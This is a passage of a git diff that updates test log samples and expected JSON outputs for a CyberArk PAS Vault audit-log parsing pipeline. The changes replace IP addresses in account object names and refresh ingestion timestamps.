@@ -1 +1 @@ -<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json
index 8660e0bf904..e7077e28818 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json
@@ -28,7 +28,7 @@
 },
 "@timestamp": "2021-03-14T13:42:20.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect"
 },
 "ecs": {
 "version": "1.12.0"
@@ -44,11 +44,11 @@ "severity": "Info", "iso_timestamp": "2021-03-14T13:42:20Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e124\u003c/MessageID\u003e\n \u003cDesc\u003eRename File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e124\u003c/MessageID\u003e\n \u003cDesc\u003eRename File\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Rename File", "issuer": "Administrator", "rfc5424": true, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect", "safe": "PSM", "station": "127.0.0.1", "action": "Rename File", 
@@ -62,8 +62,8 @@ "event": { "severity": 2, "action": "rename file", - "ingested": "2021-06-09T10:24:28.383885400Z", - "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e124\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"124\",\"Desc\":\"Rename File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:37.213140700Z", + "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e124\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"124\",\"Desc\":\"Rename File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "124", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log index d9c83a42d98..0fcaa02b4dd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log 
@@ -1 +1 @@ -<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-34.71.250.247-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-34.71.250.247-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json
index dcbae6e4f57..7cac419a9fb 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json
@@ -28,7 +28,7 @@
 },
 "@timestamp": "2021-03-14T13:42:20.000Z",
 "file": {
- "path": "Operating System-UnixSSH-34.71.250.247-PSMConnect"
+ "path": "Operating System-UnixSSH-67.43.156.15-PSMConnect"
 },
 "ecs": {
 "version": "1.12.0"
@@ -44,11 +44,11 @@ "severity": "Info", "iso_timestamp": "2021-03-14T13:42:20Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e125\u003c/MessageID\u003e\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eOperating System-UnixSSH-34.71.250.247-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e125\u003c/MessageID\u003e\n \u003cDesc\u003eRename File 
(Cont.)\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eOperating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Rename File (Cont.)", "issuer": "Administrator", "rfc5424": true, - "file": "Operating System-UnixSSH-34.71.250.247-PSMConnect", + "file": "Operating System-UnixSSH-67.43.156.15-PSMConnect", "safe": "PSM", "station": "127.0.0.1", "action": "Rename File (Cont.)", 
@@ -62,8 +62,8 @@ "event": { "severity": 2, "action": "rename file (cont.)", - "ingested": "2021-06-09T10:24:28.428911400Z", - "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e125\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eOperating System-UnixSSH-34.71.250.247-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"125\",\"Desc\":\"Rename File (Cont.)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File 
(Cont.)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Operating System-UnixSSH-34.71.250.247-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File (Cont.)\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:37.330972Z", + "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e125\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eOperating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"125\",\"Desc\":\"Rename File (Cont.)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File (Cont.)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File (Cont.)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "125", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json index cba3444deca..44483af4a8c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json 
@@ -52,7 +52,7 @@
 "event": {
 "severity": 2,
 "action": "unlock file",
- "ingested": "2021-06-09T10:24:28.461269100Z",
+ "ingested": "2021-12-09T13:36:37.448414500Z",
 "original": "\u003c5\u003e1 2021-03-10T18:33:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:33:34\",\"IsoTimestamp\":\"2021-03-10T18:33:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"126\",\"Desc\":\"Unlock File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Unlock File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Unlock File\",\"GatewayStation\":\"\"}}}",
 "code": "126",
 "kind": "event"
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log
index 3f6ae5f7871..e07bae4df57 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log
@@ -1 +1 @@ -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
